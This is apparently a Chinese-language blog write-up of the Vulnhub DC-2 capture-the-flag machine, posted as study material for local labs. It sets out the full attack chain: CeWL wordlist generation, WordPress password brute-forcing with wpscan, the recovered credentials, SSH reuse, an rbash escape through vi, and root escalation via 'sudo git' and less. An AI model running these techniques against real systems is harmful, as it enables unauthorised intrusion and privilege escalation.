DC-2 Writeup

589 字
3 分钟
DC-2 Writeup
  1. 1DC-1 Writeup
  2. 2DC-2 Writeup本文
Warning

仅供安全学习,环境均为本地虚拟机或 CTF 靶场。请勿用于未授权目标。


介绍#

跟 DC-1 一样,DC-2 也有 5 个 flag1。

注意到作者强调:

Please note that you will need to set the hosts file on your pentesting device to something like:

192.168.0.145 dc-2

Obviously, replace 192.168.0.145 with the actual IP address of DC-2.

It will make life a whole lot simpler (and a certain CMS may not work without it).

所以我们要先暂时修改 Kali 的 hosts:

echo '192.168.78.143 dc-2' | sudo tee /etc/hosts

分析#

侦察#

nmap 扫描得知:

  • OS: Debian
  • Kernel: Linux 3.2 - 4.14
  • Web Server: Apache httpd 2.4.10
  • CMS: WordPress 4.7.10
  • 开放端口:tcp 80, 7744 (SSH)

看样子要先从 Web 服务下手。


flag1#

注意到这个网站使用的是 WordPress(只要你的视力没有问题):

第一个 flag 就在首页:

Flag
Flag 1:
Your usual wordlists probably won’t work, so instead, maybe you just need to be cewl.
More passwords is always better, but sometimes you just can’t win them all.
Log in as one to see the next flag.
If you can’t find it, log in as another.

flag2#

注意到 flag1 提到了 cewl,也许你不认识这个单词,因为这不是个单词…(这里的 cewl 双关了 “cool”)

CeWLkali 是个自定义字典生成工具:

digininja
/
CeWL
CeWL is a Custom Word List Generator
—
—
no-license
Ruby

这里明确说普通的字典不好使,所以要我们用 CeWL 制作一个字典来用。


注意到在这个页面上,我们没有找到任何登录入口。

目录扫描得到:

发现了登录界面:

http://dc-2/wp-login.php

使用 WPScankali 扫描得到三个有效用户:

接下来制作字典,

echo "admin
tom
jerry" > user.txt

CeWL 可以根据网站内容制作对应的字典2:

cewl http://dc-2/ -w password.txt

通过:

wpscan --url http://dc-2/ --usernames user.txt --passwords password.txt threads 20

得到:

  • tom -> parturient
  • jerry -> adipiscing

登录后注意到 flag2:


flag3#

注意到我们可以用 tom - parturient 通过 7744 端口登录到其服务器:

登录 shell 为 rbash,权限受限。且 $PATH 只有 /home/tom/usr/bin。

查看 /home/tom/usr/bin 得知可以使用:

  • less
  • ls
  • scp
  • vi

查看 flag3.txt:

vi flag3.txt
Poor old Tom is always running after Jerry. Perhaps he should su for all the stress he causes.
flag3.txt (END)

flag4#

根据 flag3,我们需要用 su。

配置别名:

alias c="printf '\e[H\e[2J\e[3J'"
alias l='ls --color'
alias ll='ls --color -lh'
alias la='ls --color -A'
alias lla='ls --color -lhA'

查看其他用户:

less /etc/passwd

通过 vi 逃逸 rbash3:

vi -c ':set shell=/bin/bash | shell'

flag4 提示我们找 git。


flag5#

切换到 jerry 账号:

su - jerry

密码为之前的:adipiscing

通过 git 提权到 root:4

sudo git branch --help

再通过 less 执行:

!/bin/bash

得到最终 flag:


References#

Footnotes#

  1. Vulnhub - DC-2 ↩

  2. Github - CeWL ↩

  3. GTFObins - vi ↩

  4. GTFObins - git ↩

DC-2 Writeup
https://nekoside.com/posts/dc2/
作者
nekoside
发布于
2026-09-23
许可协议
CC BY-NC-SA 4.0
文章目录